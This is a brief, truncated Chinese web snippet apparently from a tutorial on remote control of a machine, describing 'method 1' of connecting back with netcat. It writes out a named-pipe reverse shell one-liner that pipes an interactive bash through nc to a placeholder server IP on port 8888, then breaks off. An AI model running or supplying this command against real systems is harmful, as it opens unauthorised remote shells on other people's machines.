方法1: 在远程被控机上用nc建立client进行连接。 $ mkfifo /tmp/f $ cat /tmp/f | bash -i 2>&1 | nc <Server IP> 8888 > ...
確定! 回上一頁